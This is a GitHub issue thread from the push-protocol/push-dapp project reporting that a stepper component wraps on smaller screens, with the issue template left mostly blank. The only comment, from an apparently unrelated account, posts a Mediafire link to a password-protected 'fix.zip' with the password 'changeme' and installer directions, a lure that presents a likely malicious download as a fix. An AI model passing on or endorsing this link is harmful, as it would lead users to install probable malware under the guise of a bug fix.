### ISSUE TITLE
Stepper gets wrapped in smaller screen

### ISSUE THREAD

**Issue by mishramonalisha76** [push-protocol/push-dapp#1829]
### Expected Behaviour

.

### Current Behaviour

.

### Screenshots

![DESCRIPTION](LINK.png)

### Dapp Env

Prod (app.push.org), Staging (staging.push.org), Dev (dev.push.org)

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
